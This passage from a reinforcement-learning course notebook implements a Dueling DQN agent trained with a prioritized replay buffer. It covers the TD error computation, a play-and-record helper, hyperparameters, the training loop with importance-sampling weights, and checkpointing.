    # target q-values; at terminal states Q(s,a) = r(s,a), so the bootstrap
    # term is zeroed out by multiplying with is_not_done
    target_qvalues_for_actions = rewards + gamma * next_state_values * is_not_done

    if check_shapes:
        assert predicted_next_qvalues.data.dim() == 2, \
            "make sure you predicted q-values for all actions in next state"
        assert next_state_values.data.dim() == 1, \
            "make sure you computed V(s') as one value per state, not per action"
        assert target_qvalues_for_actions.data.dim() == 1, \
            "there's something wrong with target q-values, they must be a vector"

    # return the per-sample TD error; the training loop squares it and applies
    # the importance sampling weights from the prioritized replay buffer
    return target_qvalues_for_actions - predicted_qvalues_for_actions
_____no_output_____
Unlicense
week04_approx_rl/prioritized_replay_dqn.ipynb
hsl89/Practical_RL
Test the memory needs of the replay buffer Initialize a DQN agent and play a total of 10^4 time steps
def play_and_record(initial_state, agent, env, exp_replay, n_steps=1): """ Play the game for exactly n steps, record every (s,a,r,s', done) to replay buffer. Whenever game ends, add record with done=True and reset the game. It is guaranteed that env has done=False when passed to this function. PLEASE DO NOT RESET ENV UNLESS IT IS "DONE" :returns: return sum of rewards over time and the state in which the env stays """ s = initial_state sum_rewards = 0 # Play the game for n_steps as per instructions above sum_rewards = 0.0 for _ in range(n_steps): qvalues = agent.get_qvalues([s]) action = agent.sample_actions(qvalues)[0] next_s, r, done, _ = env.step(action) exp_replay.add((s, action, r, next_s, done)) sum_rewards += r if done: s = env.reset() else: s = next_s return sum_rewards, s import utils import imp import replay_buffer imp.reload(replay_buffer) from replay_buffer import PrioritizedReplayBuffer #n_actions = env.action_space.n #state_shape = env.observation_space.shape agent = DuelingDQNAgent(state_shape=state_shape, n_actions=n_actions) exp_replay = PrioritizedReplayBuffer(10**4) ''' for i in range(100): state = env.reset() if not utils.is_enough_ram(min_available_gb=0.1): print(""" Less than 100 Mb RAM available. Make sure the buffer size in not too huge. Also check, maybe other processes consume RAM heavily. """ ) break play_and_record(state, agent, env, exp_replay, n_steps=10**2) if len(exp_replay) == 10**4: break print(len(exp_replay)) del exp_replay ''' seed = 42 # env n_lives = 5 # training params T = 1 # number of experiences to get from env before each update batch_size = 16 total_steps = 3 * 10**1 # total steps to train the agent decay_steps = 10**1 # steps to decay the epsilon, # after the decay_steps, epsilon stops decaying # and the agent explores with a fixed probability max_grad_norm = 50 refresh_target_network_freq = 5000 # freqency to update the target network learning_rate = 1e-4 # agent gamma = 0.99 # discount factor init_epsilon = 1.0 final_epsilon = 0.1 # buffer buffer_size = 10**4 # eval loss_freq = 50 eval_freq = 5000 # logs ckpt_dir = 'logs' ckpt_file = 'prioritized_experience_replay_ckpt.pth' metrics_file = 'prioritized_experience_replay_metrics.pth' ckpt_freq = 10*5000 # Debug param # main loop env = make_env(seed) state_shape = env.observation_space.shape n_actions = env.action_space.n state = env.reset() agent = DuelingDQNAgent(state_shape, n_actions, epsilon=1).to(device) target_network = DuelingDQNAgent(state_shape, n_actions).to(device) target_network.load_state_dict(agent.state_dict()) exp_replay = PrioritizedReplayBuffer(buffer_size) opt = torch.optim.Adam(agent.parameters(), lr=learning_rate) mean_rw_history = [] td_loss_history = [] grad_norm_history = [] initial_state_v_history = [] print("Starts training on {}".format(next(agent.parameters()).device)) # populate the buffer with 128 samples init_size = 128 play_and_record(state, agent, env, exp_replay, init_size) for step in range(total_steps): agent.epsilon = utils.linear_decay(init_epsilon, final_epsilon, step, decay_steps) # play for $T time steps and cache the exprs to the buffer _, state = play_and_record(state, agent, env, exp_replay, T) b_idx, obses_t, actions, rewards, obses_tp1, dones, weights = exp_replay.sample( batch_size) # td loss for each sample td_loss = compute_td_loss( states=obses_t, actions=actions, rewards=rewards, next_states=obses_tp1, is_done=dones, agent=agent, target_network=target_network, gamma=gamma, device=device, check_shapes=True) ''' A batch of samples from 
    prioritized replay looks like:
        (states, actions, rewards, next_states, weights, is_done)
    where weights are the importance sampling weights, so the loss is
        Loss = mean(weights * (TD error)^2)
    '''
    # compute the MSE adjusted by the importance sampling weights and backprop
    weights = torch.tensor(weights, device=device, dtype=torch.float32)
    loss = torch.mean(weights * torch.pow(td_loss, 2))
    loss.backward()
    grad_norm = nn.utils.clip_grad_norm_(agent.parameters(), max_grad_norm)
    opt.step()
    opt.zero_grad()

    # update the priorities of the sampled experiences with their new |TD error|
    exp_replay.batch_update(b_idx, np.abs(td_loss.detach().cpu().numpy()))
    # anneal the importance sampling exponent b gradually towards 1
    exp_replay.increment_b()

    if step % loss_freq == 0:
        # log the unweighted MSE and the gradient norm
        loss = torch.mean(torch.pow(td_loss.detach(), 2))
        td_loss_history.append(loss.cpu().item())
        grad_norm_history.append(float(grad_norm))

    if step % refresh_target_network_freq == 0:
        target_network.load_state_dict(agent.state_dict())

    if step % eval_freq == 0:
        mean_rw_history.append(evaluate(
            make_env(clip_rewards=True, seed=step), agent, n_games=3*n_lives, greedy=True
        ))
        initial_state_q_values = agent.get_qvalues(
            [make_env(seed=step).reset()]
        )
        initial_state_v_history.append(np.max(initial_state_q_values))

        print("buffer size = %i, epsilon: %.5f" %
              (len(exp_replay), agent.epsilon))

    # checkpointing
    if step % ckpt_freq == 0:
        print("checkpointing ...")
        if not os.path.exists(ckpt_dir):
            os.makedirs(ckpt_dir)

        # checkpoint the model and optimizer
        checkpoint = {
            "step": step,
            "agent": agent.state_dict(),
            "epsilon": agent.epsilon,
            "target_network": target_network.state_dict(),
            "optimizer": opt.state_dict(),
            "replay_buffer": exp_replay
        }
        torch.save(checkpoint, os.path.join(ckpt_dir, ckpt_file))

        # save the performance metrics
        metrics = {
            "mean_rw_history": mean_rw_history,
            "td_loss_history": td_loss_history,
            "grad_norm_history": grad_norm_history,
            "initial_state_v_history": initial_state_v_history
        }
        torch.save(metrics, os.path.join(ckpt_dir, metrics_file))

# final checkpoint of the model and optimizer after training
checkpoint = {
    "step": step,
    "agent": agent.state_dict(),
    "epsilon": agent.epsilon,
    "target_network": target_network.state_dict(),
    "optimizer": opt.state_dict(),
    "replay_buffer": exp_replay
}
torch.save(checkpoint, os.path.join(ckpt_dir, ckpt_file))

# save the performance metrics
metrics = {
    "mean_rw_history": mean_rw_history,
    "td_loss_history": td_loss_history,
    "grad_norm_history": grad_norm_history,
    "initial_state_v_history": initial_state_v_history
}
torch.save(metrics, os.path.join(ckpt_dir, metrics_file))
Starts training on cpu buffer size = 129, epsilon: 1.00000 checkpointing ...
Unlicense
week04_approx_rl/prioritized_replay_dqn.ipynb
hsl89/Practical_RL